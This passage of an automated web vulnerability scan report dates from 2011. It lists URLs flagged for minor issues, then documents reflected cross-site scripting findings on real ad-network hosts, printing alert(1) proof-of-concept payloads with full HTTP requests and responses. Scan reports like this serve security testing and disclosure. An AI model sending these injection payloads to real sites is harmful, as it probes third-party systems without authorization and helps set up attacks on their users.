14.31. http://kellwood.com/brand_images/koret.jpg

14.32. http://kellwood.com/brand_images/logo_adam.png

14.33. http://kellwood.com/brand_images/logo_babyphat.png

14.34. http://kellwood.com/brand_images/logo_blkdnm.png

14.35. http://kellwood.com/brand_images/logo_briggs.png

14.36. http://kellwood.com/brand_images/logo_davidmeister.png

14.37. http://kellwood.com/brand_images/logo_democracy.png

14.38. http://kellwood.com/brand_images/logo_jax.png

14.39. http://kellwood.com/brand_images/logo_jolt.png

14.40. http://kellwood.com/brand_images/logo_koret.png

14.41. http://kellwood.com/brand_images/logo_mymichelle.png

14.42. http://kellwood.com/brand_images/logo_phatfarm.png

14.43. http://kellwood.com/brand_images/logo_rebeccataylor.png

14.44. http://kellwood.com/brand_images/logo_rewind.png

14.45. http://kellwood.com/brand_images/logo_sagharbor.png

14.46. http://kellwood.com/brand_images/logo_sangria.png

14.47. http://kellwood.com/brand_images/logo_vince.png

14.48. http://kellwood.com/brand_images/logo_xoxo.png

14.49. http://kellwood.com/brand_images/mymichelle.jpg

14.50. http://kellwood.com/brand_images/phatfarm.jpg

14.51. http://kellwood.com/brand_images/rebeccataylor.jpg

14.52. http://kellwood.com/brand_images/rewind.jpg

14.53. http://kellwood.com/brand_images/sagharbor.jpg

14.54. http://kellwood.com/brand_images/sangria.jpg

14.55. http://kellwood.com/brand_images/vince.jpg

14.56. http://kellwood.com/brand_images/xoxo.jpg

14.57. http://kellwood.com/brand_text/text_adam.png

14.58. http://kellwood.com/brand_text/text_babyphat.png

14.59. http://kellwood.com/brand_text/text_blkdnm.png

14.60. http://kellwood.com/brand_text/text_briggs.png

14.61. http://kellwood.com/brand_text/text_davidmeister.png

14.62. http://kellwood.com/brand_text/text_democracy.png

14.63. http://kellwood.com/brand_text/text_jax.png

14.64. http://kellwood.com/brand_text/text_jolt.png

14.65. http://kellwood.com/brand_text/text_koret.png

14.66. http://kellwood.com/brand_text/text_mymichelle.png

14.67. http://kellwood.com/brand_text/text_phatfarm.png

14.68. http://kellwood.com/brand_text/text_rebeccataylor.png

14.69. http://kellwood.com/brand_text/text_rewind.png

14.70. http://kellwood.com/brand_text/text_sagharbor.png

14.71. http://kellwood.com/brand_text/text_sangria.png

14.72. http://kellwood.com/brand_text/text_vince.png

14.73. http://kellwood.com/brand_text/text_xoxo.png

14.74. http://kellwood.com/favicon.ico

14.75. http://kellwood.com/homeImageRoll.swf

14.76. http://kellwood.com/home_images/home1.jpg

14.77. http://kellwood.com/home_images/home2.jpg

14.78. http://kellwood.com/home_images/home5.jpg

14.79. http://kellwood.com/home_images/home6.jpg

14.80. http://kellwood.com/home_images/home7.jpg

14.81. http://kellwood.com/kwd_brands.swf

14.82. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

14.83. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

14.84. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

14.85. http://www.facebook.com/connect/connect.php

14.86. http://www.facebook.com/connect/connect.php

14.87. http://www.facebook.com/connect/connect.php

14.88. http://www.facebook.com/connect/connect.php

14.89. http://www.facebook.com/connect/connect.php

14.90. http://www.facebook.com/connect/connect.php

14.91. http://www.facebook.com/connect/connect.php

14.92. http://www.facebook.com/connect/connect.php

14.93. http://www.facebook.com/connect/connect.php

14.94. http://www.facebook.com/connect/connect.php

14.95. http://www.facebook.com/connect/connect.php

14.96. http://www.facebook.com/connect/connect.php

14.97. http://www.facebook.com/connect/connect.php

14.98. http://www.facebook.com/extern/login_status.php

14.99. http://www.facebook.com/plugins/activity.php

14.100. http://www.facebook.com/plugins/activity.php

14.101. http://www.facebook.com/plugins/activity.php

14.102. http://www.facebook.com/plugins/activity.php

14.103. http://www.facebook.com/plugins/activity.php

14.104. http://www.facebook.com/plugins/activity.php

14.105. http://www.facebook.com/plugins/activity.php

14.106. http://www.facebook.com/plugins/activity.php

14.107. http://www.facebook.com/plugins/activity.php

14.108. http://www.facebook.com/plugins/activity.php

14.109. http://www.facebook.com/plugins/like.php

14.110. http://www.facebook.com/plugins/like.php

14.111. http://www.facebook.com/plugins/like.php

14.112. http://www.facebook.com/plugins/like.php

14.113. http://www.facebook.com/plugins/like.php

14.114. http://www.facebook.com/plugins/like.php

14.115. http://www.facebook.com/plugins/like.php

14.116. http://www.facebook.com/plugins/likebox.php

14.117. http://www.facebook.com/plugins/likebox.php

14.118. http://www.facebook.com/plugins/likebox.php

14.119. http://www.facebook.com/plugins/likebox.php

14.120. http://www.facebook.com/plugins/likebox.php

14.121. http://www.facebook.com/plugins/recommendations.php

14.122. http://www.facebook.com/plugins/recommendations.php

14.123. http://www.facebook.com/plugins/recommendations.php

14.124. http://www.facebook.com/plugins/recommendations.php

14.125. http://www.facebook.com/plugins/recommendations.php

14.126. http://www.facebook.com/plugins/recommendations.php

14.127. http://www.facebook.com/plugins/recommendations.php

14.128. http://www.facebook.com/plugins/recommendations.php

14.129. http://www.facebook.com/plugins/recommendations.php

14.130. http://www.facebook.com/plugins/recommendations.php

14.131. http://www.facebook.com/plugins/recommendations.php

14.132. http://www.facebook.com/plugins/recommendations.php

14.133. http://www.facebook.com/plugins/recommendations.php

14.134. http://www.foxnews.com/static/all/js/head.js

14.135. http://www.foxnews.com/static/fn2/ws/politics/js/simple_include/elections/elections.js

14.136. http://www.motivitycms.com/favicon.ico

14.137. http://www.motivitycms.com/images/150w.gif

14.138. http://www.motivitycms.com/images/ae-before-after.gif

14.139. http://www.motivitycms.com/images/arrow-bullet.gif

14.140. http://www.motivitycms.com/images/blue-gradient.gif

14.141. http://www.motivitycms.com/images/bookmark-icon.gif

14.142. http://www.motivitycms.com/images/bottom-footer-bg.jpg

14.143. http://www.motivitycms.com/images/bullet-blue.gif

14.144. http://www.motivitycms.com/images/careers-footer-nav.jpg

14.145. http://www.motivitycms.com/images/commerceEnabled.png

14.146. http://www.motivitycms.com/images/contact-footer-nav.jpg

14.147. http://www.motivitycms.com/images/customerBrocade.gif

14.148. http://www.motivitycms.com/images/customerSysco.gif

14.149. http://www.motivitycms.com/images/email-icon.gif

14.150. http://www.motivitycms.com/images/footer-bg.jpg

14.151. http://www.motivitycms.com/images/form-bg.jpg

14.152. http://www.motivitycms.com/images/go-bullet.jpg

14.153. http://www.motivitycms.com/images/google-web-optimzer.gif

14.154. http://www.motivitycms.com/images/iconDollarSign.gif

14.155. http://www.motivitycms.com/images/insidebkgrd.gif

14.156. http://www.motivitycms.com/images/link-list-bottom-border.jpg

14.157. http://www.motivitycms.com/images/link-list-top.jpg

14.158. http://www.motivitycms.com/images/logo-div-bg.jpg

14.159. http://www.motivitycms.com/images/natureair-screenshot.gif

14.160. http://www.motivitycms.com/images/nav/about.gif

14.161. http://www.motivitycms.com/images/nav/aboutOver.gif

14.162. http://www.motivitycms.com/images/nav/customers.gif

14.163. http://www.motivitycms.com/images/nav/customersOver.gif

14.164. http://www.motivitycms.com/images/nav/home.gif

14.165. http://www.motivitycms.com/images/nav/marketing-platform.gif

14.166. http://www.motivitycms.com/images/nav/marketing-platformOver.gif

14.167. http://www.motivitycms.com/images/nav/partners.gif

14.168. http://www.motivitycms.com/images/nav/partnersOver.gif

14.169. http://www.motivitycms.com/images/nav/services.gif

14.170. http://www.motivitycms.com/images/please-contact-me.gif

14.171. http://www.motivitycms.com/images/print-icon.gif

14.172. http://www.motivitycms.com/images/rightcolumn-shadow.gif

14.173. http://www.motivitycms.com/images/sign-up-btn.gif

14.174. http://www.motivitycms.com/images/support-footer-nav.jpg

15. Robots.txt file

15.1. http://appointron.com/

15.2. http://feeds.bbci.co.uk/news/rss.xml

15.3. http://fls.doubleclick.net/activityi

15.4. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1063327355/

15.5. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

15.6. http://segment-pixel.invitemedia.com/pixel

15.7. http://www.google-analytics.com/__utm.gif

15.8. https://www.google.com/accounts/ServiceLogin

15.9. http://www.googleadservices.com/pagead/conversion/992540712/

16. HTML does not specify charset

16.1. http://ad.adsrvr.org/container/7j9i29e.1.html

16.2. http://ad.doubleclick.net/adi/fnc/root/stocksearch

16.3. http://ad.doubleclick.net/adi/wn.loc.wcax/community

16.4. http://ad.doubleclick.net/adi/wn.loc.wcax/homepage

16.5. http://ad.doubleclick.net/adi/wn.loc.wcax/mostpopular

16.6. http://ad.doubleclick.net/adi/wn.loc.wcax/news

16.7. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-national

16.8. http://ad.doubleclick.net/adi/wn.loc.wcax/news-ap-state

16.9. http://ad.doubleclick.net/adi/wn.loc.wcax/political

16.10. http://ad.doubleclick.net/adi/wn.loc.wcax/promotion1

16.11. http://ad.doubleclick.net/adi/wn.loc.wcax/sales-lifestyle

16.12. http://ad.doubleclick.net/adi/wn.loc.wcax/weather

16.13. http://ad.yieldmanager.com/iframe3

16.14. http://ads.pointroll.com/PortalServe/

16.15. http://adserver.veruta.com/cookiematch.fcgi

16.16. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

16.17. http://amch.questionmarket.com/adscgen/st.php

16.18. http://bs.serving-sys.com/BurstingPipe/adServer.bs

16.19. http://cplads.appspot.com/creatives/aio_300_250/GoogleForm_dp.html

16.20. http://fls.doubleclick.net/activityi

16.21. http://ftpcontent.worldnow.com/wcax/custom/branding_feature_i.html

16.22. http://hostedusa3.whoson.com/include.js

16.23. http://js.adsonar.com/js/pass.html

16.24. http://kellwood.com/homeImageFiles.asp

16.25. http://now.eloqua.com/visitor/v200/svrGP.aspx

16.26. http://odb.outbrain.com/utils/ping.html

16.27. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom

16.28. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/ros

16.29. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/politics

16.30. http://tag.admeld.com/ad/iframe/3/foxnews/728x90/ros

16.31. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/300x250/ros

16.32. http://tag.admeld.com/ad/iframe/3/foxnewsrtb/728x90/ros

16.33. http://tracking.placelocal.com/

16.34. http://w55c.net/ct/cms-2-frame.html

16.35. http://www.rss-info.com/rss2.php

16.36. http://www.wptz.com/esi/postcaching/getKAtoken.esi

17. Content type incorrectly stated

17.1. http://a0.twimg.com/profile_images/313260532/thurston_normal.gif

17.2. http://a1.interclick.com/getInPageJS.aspx

17.3. http://a1.interclick.com/getInPageJSProcess.aspx

17.4. http://a2.twimg.com/profile_images/1133407227/ugh_normal.jpg

17.5. http://a2.twimg.com/profile_images/313254997/carlson_normal.gif

17.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/779.0.js.88x31/517745

17.7. http://adadvisor.net/adscores/g.js

17.8. http://admeld.lucidmedia.com/clicksense/admeld/match

17.9. http://ads.adap.tv/beacons

17.10. http://adserver.veruta.com/cookiematch.fcgi

17.11. http://altfarm.mediaplex.com/ad/js/1551-48114-17349-5

17.12. http://amch.questionmarket.com/adscgen/st.php

17.13. http://api.kickapps.com/rest/comments/62976

17.14. http://api.twitter.com/1/WCAX_DAN/lists/wcaxweather/statuses.json

17.15. http://bh.contextweb.com/bh/sync/admeld

17.16. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.17. http://cdn.taboolasyndication.com/libtrc/hearst-wptz/rbox.en.4-6-12-44788.json

17.18. http://cdnserve.a-widget.com/service/getWidget2.kickAction

17.19. http://clientapps.kickapps.com/hearst/articleTitles.php

17.20. http://clientapps.kickapps.com/hearst/comments/cnr_100plus.php

17.21. http://clientapps.kickapps.com/hearst/comments/include.php

17.22. http://clientapps.kickapps.com/hearst/comments/start.php

17.23. http://hostedusa3.whoson.com/include.js

17.24. http://javadl-esd.sun.com/update/AU/map-2.0.3.1.xml

17.25. http://kellwood.com/homeImageFiles.asp

17.26. http://nexus.ensighten.com/IB/serverComponent.php

17.27. http://now.eloqua.com/visitor/v200/svrGP.aspx

17.28. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif

17.29. http://server.iad.liveperson.net/hcp/html/mTag.js

17.30. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

17.31. http://tracking.placelocal.com/

17.32. http://trc.taboolasyndication.com/hearst-wptz/trc/2/json

17.33. http://www.acquisio.com/wp-content/themes/acquisio/images/favicon.ico

17.34. http://www.clickability.com/templates/Corp_Scripts_Template.js

17.35. http://www.clickability.com/templates/swfobject.js

17.36. http://www.foxnews.com/authentication/logout/submit

17.37. http://www.foxnews.com/favicon.ico

17.38. http://www.foxnews.com/ucat/images/291976_Jennifer121.jpg

17.39. http://www.foxnews.com/ucat/images/292526_partridges121.jpg

17.40. http://www.foxnews.com/ucat/images/292528_sucker-punch-vanessa-hudgens121.jpg

17.41. http://www.foxnews.com/weather/feed/getWeatherJsonP

17.42. http://www.internetrix.net/favicon.ico

17.43. http://www.internetrix.net/images/event_list_bg.gif

17.44. http://www.rss-info.com/rss2.php

17.45. http://www.vermontopia.com/custom/content_files/img_logo.gif

17.46. http://www.vermontopia.com/custom/content_files/noimage.gif

17.47. http://www.wptz.com/_public/js/ibLast.js

17.48. http://www.wptz.com/esi/postcaching/getKAtoken.esi

18. Content type is not specified

18.1. http://ad.yieldmanager.com/st

18.2. http://ads.bluelithium.com/st

18.3. http://ads.pointroll.com/PortalServe/

18.4. http://lfov.net/favicon.ico

18.5. http://lfov.net/webrecorder/g/chimera.js

18.6. http://lfov.net/webrecorder/js/listen.js

18.7. http://pcm2.map.pulsemgr.com/uds/pc

18.8. http://ulocal.wptz.com/service/isUserLoggedIn.kickAction

19. SSL certificate


1. Cross-site scripting (reflected)  next
There are 163 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43f3d'-alert(1)-'d25126b0b26 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews43f3d'-alert(1)-'d25126b0b26/tier2_031010;sz=300x250;ord=1302538878? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Vary: Accept-Encoding
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews43f3d'-alert(1)-'d25126b0b26/tier2_031010;sz=300x250;net=cm;ord=1302538878;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
1.2. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 526b1'-alert(1)-'91a29197829 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010526b1'-alert(1)-'91a29197829;sz=300x250;ord=1302538878? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 451
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010526b1'-alert(1)-'91a29197829;sz=300x250;net=cm;ord=1302538878;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
1.3. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45a4e'-alert(1)-'a7de91708c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010;sz=300x250;ord=1302538878?&45a4e'-alert(1)-'a7de91708c1=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 455
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010;sz=300x250;net=cm;ord=1302538878?&45a4e'-alert(1)-'a7de91708c1=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
1.4. http://a.collective-media.net/adj/cm.foxnews/tier2_031010 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.foxnews/tier2_031010

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc880'-alert(1)-'d086b252dc0 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.foxnews/tier2_031010;sz=300x250;ord=1302538878?cc880'-alert(1)-'d086b252dc0 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f3c48b4c0582b; JY57=3cSilT0yz8Xh8jOg0fJAMcgeFnMmtGSsZeOSn2prstLRXgYh65wKGKA

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 11 Apr 2011 16:21:20 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 11-May-2011 16:21:20 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.foxnews/tier2_031010;sz=300x250;net=cm;ord=1302538878?cc880'-alert(1)-'d086b252dc0;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...
1.5. http://a.rfihub.com/sed [pa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 88e8f'><script>alert(1)</script>2f874ec50da was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=300&h=250&re=12387&pv=0&ra=3525255080.7230796942021698&rb=445&ca=&rc=10.2&rd=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%253Fsa%253Dl%2526ai%253DBKgktkFKgTfjNO6X6lAfi7omAC6-TxYsCj9qbsyK3zOLcHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi0yMTAzNTUzODUzMDgyNjAzoAGz7MfrA7IBDHd3dy53Y2F4LmNvbboBCjMwMHgyNTBfYXPIAQnaAS9odHRwOi8vd3d3LndjYXguY29tL0dsb2JhbC9jYXRlZ29yeS5hc3A_Qz0xODgzNpgC8hHAAgTIAs3vzw6oAwHoAxDoA9Qq6APnAvUDAAAARPUDIAAAAIAGo6es8NStl8O_AQ%2526num%253D1%2526sig%253DAGiWqtwsnfDOzRnIRJLXiZuNn2CCD9KiLg%2526client%253Dca-pub-2103553853082603%2526adurl%253D&ua=&ub=&uc=&ud=&ue=&pa=ppre35252550824788e8f'><script>alert(1)</script>2f874ec50da&pb=&pc=&pd=&pg=&ct=1302352525508&co=false&ep=TaBSkAAO5vgK5T0lsAJ3YlpV74vOvScCMvR4kw&ri=4da052900ee6f8ae53d25b0277621&rs=&ai=9530&rt=10261&pe=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-2103553853082603%26output%3Dhtml%26h%3D250%26slotname%3D8163847123%26w%3D300%26lmt%3D1302370522%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18836%26dt%3D1302352522769%26bpp%3D3%26shv%3Dr20110330%26jsv%3Dr20110321-2%26correlator%3D1302352522793%26frm%3D0%26adk%3D2815960337%26ga_vid%3D983270927.1302352523%26ga_sid%3D1302352523%26ga_hid%3D1867116075%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D1063%26bih%3D1038%26ref%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18963%26fu%3D0%26ifi%3D1%26dtd%3D103%26xpc%3DmxzeQN3016%26p%3Dhttp%253A%2F%2Fwww.wcax.com&pf= HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370522&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18836&dt=1302352522769&bpp=3&shv=r20110330&jsv=r20110321-2&correlator=1302352522793&frm=0&adk=2815960337&ga_vid=983270927.1302352523&ga_sid=1302352523&ga_hid=1867116075&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18963&fu=0&ifi=1&dtd=103&xpc=mxzeQN3016&p=http%3A//www.wcax.com
